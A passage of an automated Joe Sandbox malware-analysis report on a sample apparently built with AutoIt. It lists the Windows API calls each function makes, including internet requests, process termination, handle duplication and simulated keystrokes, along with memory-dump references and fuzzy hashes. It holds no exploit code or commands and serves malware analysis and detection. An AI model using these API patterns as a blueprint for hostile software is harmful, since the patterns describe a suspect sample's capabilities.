                                                                                                        • Part of subcall function 00D17417: GetWindowRect.USER32(?,?), ref: 00D1747E
                                                                                                        • Part of subcall function 00D17417: ScreenToClient.USER32(?,?), ref: 00D174A6
                                                                                                      • GetDC.USER32 ref: 00D56045
                                                                                                      • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00D56058
                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00D56066
                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00D5607B
                                                                                                      • ReleaseDC.USER32(?,00000000), ref: 00D56083
                                                                                                      • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00D56114
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                                      • String ID: U
                                                                                                      • API String ID: 4009187628-3372436214
                                                                                                      • Opcode ID: 4fa50c157e4fbaaa3d9add92362a2005b6bc66290b06f0ac5a6eacd51310e9ff
                                                                                                      • Instruction ID: 3dae3cdbe5e3b2813884854729594d35747486b64b9ecb89f13a1352d8acc25c
                                                                                                      • Opcode Fuzzy Hash: 4fa50c157e4fbaaa3d9add92362a2005b6bc66290b06f0ac5a6eacd51310e9ff
                                                                                                      • Instruction Fuzzy Hash: 16710431500205EFCF258F68C8849FA7BB5FF49366F184269ED665B2A6CB30C885DB70
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • LoadStringW.USER32(00000066,?,00000FFF,00DADCEC), ref: 00D83F3E
                                                                                                        • Part of subcall function 00D1B25F: _wcslen.LIBCMT ref: 00D1B269
                                                                                                      • LoadStringW.USER32(?,?,00000FFF,?), ref: 00D83F64
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: LoadString$_wcslen
                                                                                                      • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                      • API String ID: 4099089115-2391861430
                                                                                                      • Opcode ID: 622d58f4d431c45abc0a1c31ea8d493bfc2c5a735a95bcd45ec94237633b5144
                                                                                                      • Instruction ID: 50935fc938c33742e1ec0b8173cd3d0d112363f2f35dae9f5d490d666e3d804c
                                                                                                      • Opcode Fuzzy Hash: 622d58f4d431c45abc0a1c31ea8d493bfc2c5a735a95bcd45ec94237633b5144
                                                                                                      • Instruction Fuzzy Hash: 79514D3190025ABACF15FBE0EC42EEEBB79EF14314F044165F509621A2EB716A99DF70
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • DefDlgProcW.USER32(?,00000111,?,?,?,?,?), ref: 00DA977C
                                                                                                        • Part of subcall function 00DA87FD: IsWindow.USER32(00000000), ref: 00DA8896
                                                                                                        • Part of subcall function 00DA87FD: IsWindowEnabled.USER32(00000000), ref: 00DA88A2
                                                                                                      • GetMenuItemInfoW.USER32(?,?,?,?), ref: 00DA982E
                                                                                                      • GetMenuItemCount.USER32(?), ref: 00DA984B
                                                                                                      • GetMenuItemID.USER32(?), ref: 00DA985B
                                                                                                      • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00DA988D
                                                                                                      • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00DA98CF
                                                                                                      • CheckMenuRadioItem.USER32(?,?,?,?,00000400), ref: 00DA9900
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ItemMenu$Info$Window$CheckCountEnabledProcRadio
                                                                                                      • String ID: 0
                                                                                                      • API String ID: 4045175071-4108050209
                                                                                                      • Opcode ID: 231e9e4f848a8a1aba0625ac140b956a83802f78f08be34b78949dd56ef6d4b4
                                                                                                      • Instruction ID: db193f51b5dc71f949df0419477610b7692db89f8031f7512eef38641eee4a58
                                                                                                      • Opcode Fuzzy Hash: 231e9e4f848a8a1aba0625ac140b956a83802f78f08be34b78949dd56ef6d4b4
                                                                                                      • Instruction Fuzzy Hash: B5518A72508341AFD710CF25D894AABBBE8FF8A314F04091DF99697291CB35E805CB72
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00D8CBCF
                                                                                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00D8CBF7
                                                                                                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00D8CC27
                                                                                                      • GetLastError.KERNEL32 ref: 00D8CC7F
                                                                                                      • SetEvent.KERNEL32(?), ref: 00D8CC93
                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 00D8CC9E
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                                                      • String ID:
                                                                                                      • API String ID: 3113390036-3916222277
                                                                                                      • Opcode ID: 1ff51b4400c25b841a1daefa0f0502a0fa002574adff02a593d8ea3b47f60207
                                                                                                      • Instruction ID: 69d97771ff24a0f7a0cd0fbf1f9b126150b863c65524fdaa4427420a995d5492
                                                                                                      • Opcode Fuzzy Hash: 1ff51b4400c25b841a1daefa0f0502a0fa002574adff02a593d8ea3b47f60207
                                                                                                      • Instruction Fuzzy Hash: 81319AB1610308EFD721AF65CD88ABB7BFDEB4A744B14551EF44AD2640DB34D9049BB0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00D55437,?,?,Bad directive syntax error,00DADCD0,00000000,00000010,?,?), ref: 00D7A14B
                                                                                                      • LoadStringW.USER32(00000000,?,00D55437,?), ref: 00D7A152
                                                                                                        • Part of subcall function 00D1B25F: _wcslen.LIBCMT ref: 00D1B269
                                                                                                      • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00D7A216
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: HandleLoadMessageModuleString_wcslen
                                                                                                      • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                                      • API String ID: 858772685-4153970271
                                                                                                      • Opcode ID: 809022540086da6acce692992fdf24eba6b92f46116686673754ff19695c84c8
                                                                                                      • Instruction ID: f1cff414fc1ca56ebc5370ebb571ce1f4efb314c840454d240f3e9d8fdb030fc
                                                                                                      • Opcode Fuzzy Hash: 809022540086da6acce692992fdf24eba6b92f46116686673754ff19695c84c8
                                                                                                      • Instruction Fuzzy Hash: 6D217E3180021EBFDF02AF90DC06EEE7B3AFF18304F044456F51A651A2EA719A58DB31
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • GetParent.USER32 ref: 00D7293B
                                                                                                      • GetClassNameW.USER32(00000000,?,00000100), ref: 00D72950
                                                                                                      • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00D729DD
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ClassMessageNameParentSend
                                                                                                      • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                      • API String ID: 1290815626-3381328864
                                                                                                      • Opcode ID: 49853e5df8f695cf61ac5531df3642d16016a0108919f8cfe06ba2f99d730ca8
                                                                                                      • Instruction ID: 6ce23323e578f462ccbd6daa31a3cd511498d4a3850770d4fa9bf576167e2da9
                                                                                                      • Opcode Fuzzy Hash: 49853e5df8f695cf61ac5531df3642d16016a0108919f8cfe06ba2f99d730ca8
                                                                                                      • Instruction Fuzzy Hash: 7A11CE76688306BAEA002620AC06DFA779CCB05730F284027FA49E45D1FBA1E84059B4
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                                                                                      • String ID:
                                                                                                      • API String ID: 1282221369-0
                                                                                                      • Opcode ID: ce8c9b690be14302274cad1dfec4717eab3a0dbed75e54bf78131a3044129bfd
                                                                                                      • Instruction ID: fe1721569184f2a47ff23b59c5e43b007f9ccc6b5b942905a12b3cda3802d1a3
                                                                                                      • Opcode Fuzzy Hash: ce8c9b690be14302274cad1dfec4717eab3a0dbed75e54bf78131a3044129bfd
                                                                                                      • Instruction Fuzzy Hash: 4861F371E00345AFDF21AF649CC5A7A7BE5EF02720F58026DF944EB285E6B198408BB1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00DA5AE5
                                                                                                      • ShowWindow.USER32(?,00000000), ref: 00DA5B26
                                                                                                      • ShowWindow.USER32(?,00000005,?,00000000), ref: 00DA5B2C
                                                                                                      • SetFocus.USER32(?,?,00000005,?,00000000), ref: 00DA5B30
                                                                                                        • Part of subcall function 00DA7919: DeleteObject.GDI32(00000000), ref: 00DA7945
                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00DA5B6C
                                                                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00DA5B79
                                                                                                      • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00DA5BAC
                                                                                                      • SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00DA5BE6
                                                                                                      • SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00DA5BF5
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                                                                                                      • String ID:
                                                                                                      • API String ID: 3210457359-0
                                                                                                      • Opcode ID: 5b1eb6933e409b7e44f9412b21eb643621706698e01ccd96ff5848e8313fb084
                                                                                                      • Instruction ID: 545f470560c7e73f1c35237762208bde7708ce0ba9ea343c2f2162c11a68854c
                                                                                                      • Opcode Fuzzy Hash: 5b1eb6933e409b7e44f9412b21eb643621706698e01ccd96ff5848e8313fb084
                                                                                                      • Instruction Fuzzy Hash: DD51B534741B08BFEF249F54EC85BD93B65FB06320F188211F616962E9C775A990DBB0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00D528F1
                                                                                                      • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 00D5290A
                                                                                                      • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00D5291A
                                                                                                      • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 00D52932
                                                                                                      • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00D52953
                                                                                                      • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00D111F5,00000000,00000000,00000000,000000FF,00000000), ref: 00D52962
                                                                                                      • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00D5297F
                                                                                                      • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00D111F5,00000000,00000000,00000000,000000FF,00000000), ref: 00D5298E
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                                                      • String ID:
                                                                                                      • API String ID: 1268354404-0
                                                                                                      • Opcode ID: 921a56f416ce30541f9e1aa785a47b70dcd4605d13abc0db83298497e1206661
                                                                                                      • Instruction ID: 278a63298d729e5a5c2f4f635011b3731e459f0091b0d2831d29892031782c5c
                                                                                                      • Opcode Fuzzy Hash: 921a56f416ce30541f9e1aa785a47b70dcd4605d13abc0db83298497e1206661
                                                                                                      • Instruction Fuzzy Hash: 8B518634A40309AFDB20DF25DC81BAA3BB6EB49710F144528FA56D72A0DB70E994DF70
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00D8CADF
                                                                                                      • GetLastError.KERNEL32 ref: 00D8CAF2
                                                                                                      • SetEvent.KERNEL32(?), ref: 00D8CB06
                                                                                                        • Part of subcall function 00D8CBB0: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00D8CBCF
                                                                                                        • Part of subcall function 00D8CBB0: GetLastError.KERNEL32 ref: 00D8CC7F
                                                                                                        • Part of subcall function 00D8CBB0: SetEvent.KERNEL32(?), ref: 00D8CC93
                                                                                                        • Part of subcall function 00D8CBB0: InternetCloseHandle.WININET(00000000), ref: 00D8CC9E
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                                                                                      • String ID:
                                                                                                      • API String ID: 337547030-0
                                                                                                      • Opcode ID: 64acb3f40f8fc0be37e1776d3b81bd5826d7f50f97c5d163ed19975e4f77a567
                                                                                                      • Instruction ID: 1234885341df483245df511306952d79a0570eb73f8c2f0d64a2949319c2776e
                                                                                                      • Opcode Fuzzy Hash: 64acb3f40f8fc0be37e1776d3b81bd5826d7f50f97c5d163ed19975e4f77a567
                                                                                                      • Instruction Fuzzy Hash: DB313571211B05EFDB21AFA1CD45A76BBEAFF49340B14541DE89AC2A20D735E814ABB0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                        • Part of subcall function 00D742CC: GetWindowThreadProcessId.USER32(?,00000000), ref: 00D742E6
                                                                                                        • Part of subcall function 00D742CC: GetCurrentThreadId.KERNEL32 ref: 00D742ED
                                                                                                        • Part of subcall function 00D742CC: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00D72E43), ref: 00D742F4
                                                                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 00D72E4D
                                                                                                      • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00D72E6B
                                                                                                      • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00D72E6F
                                                                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 00D72E79
                                                                                                      • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00D72E91
                                                                                                      • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00D72E95
                                                                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 00D72E9F
                                                                                                      • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00D72EB3
                                                                                                      • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00D72EB7
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                                      • String ID:
                                                                                                      • API String ID: 2014098862-0
                                                                                                      • Opcode ID: 77105733ff4a6553d28cafa339a6dc2c73e53d8e66e55dc4595a43301cb020a4
                                                                                                      • Instruction ID: 2ecdd8c0f58b9f23e0828f548aa52d9fddffde34c9bc1c64e4972f5414e8124b
                                                                                                      • Opcode Fuzzy Hash: 77105733ff4a6553d28cafa339a6dc2c73e53d8e66e55dc4595a43301cb020a4
                                                                                                      • Instruction Fuzzy Hash: D501D8313803147BFB106B699C8AF663F5ADB5AB11F101001F319EE2E1CAE15445CA79
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00D71CD9,?,?,00000000), ref: 00D7209C
                                                                                                      • HeapAlloc.KERNEL32(00000000,?,00D71CD9,?,?,00000000), ref: 00D720A3
                                                                                                      • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00D71CD9,?,?,00000000), ref: 00D720B8
                                                                                                      • GetCurrentProcess.KERNEL32(?,00000000,?,00D71CD9,?,?,00000000), ref: 00D720C0
                                                                                                      • DuplicateHandle.KERNEL32(00000000,?,00D71CD9,?,?,00000000), ref: 00D720C3
                                                                                                      • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00D71CD9,?,?,00000000), ref: 00D720D3
                                                                                                      • GetCurrentProcess.KERNEL32(00D71CD9,00000000,?,00D71CD9,?,?,00000000), ref: 00D720DB
                                                                                                      • DuplicateHandle.KERNEL32(00000000,?,00D71CD9,?,?,00000000), ref: 00D720DE
                                                                                                      • CreateThread.KERNEL32(00000000,00000000,00D72104,00000000,00000000,00000000), ref: 00D720F8
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                      • String ID:
                                                                                                      • API String ID: 1957940570-0
                                                                                                      • Opcode ID: 460dfc7fef17a7c8f280a30189ca8f552d1eeb194f049cc79844dfb771c7369a
                                                                                                      • Instruction ID: f765ea8ced93008968fdafec99d5cb262bcf1d68e7f4699a2263e2b17b4c4fd7
                                                                                                      • Opcode Fuzzy Hash: 460dfc7fef17a7c8f280a30189ca8f552d1eeb194f049cc79844dfb771c7369a
                                                                                                      • Instruction Fuzzy Hash: B701CDB5240348BFE710AFA5DC4DF6B3BADEB89711F404411FA05DB6A1DA709800CB30
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                        • Part of subcall function 00D7DC9C: CreateToolhelp32Snapshot.KERNEL32 ref: 00D7DCC1
                                                                                                        • Part of subcall function 00D7DC9C: Process32FirstW.KERNEL32(00000000,?), ref: 00D7DCCF
                                                                                                        • Part of subcall function 00D7DC9C: CloseHandle.KERNEL32(00000000), ref: 00D7DD9C
                                                                                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00D9AACC
                                                                                                      • GetLastError.KERNEL32 ref: 00D9AADF
                                                                                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00D9AB12
                                                                                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 00D9ABC7
                                                                                                      • GetLastError.KERNEL32(00000000), ref: 00D9ABD2
                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00D9AC23
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
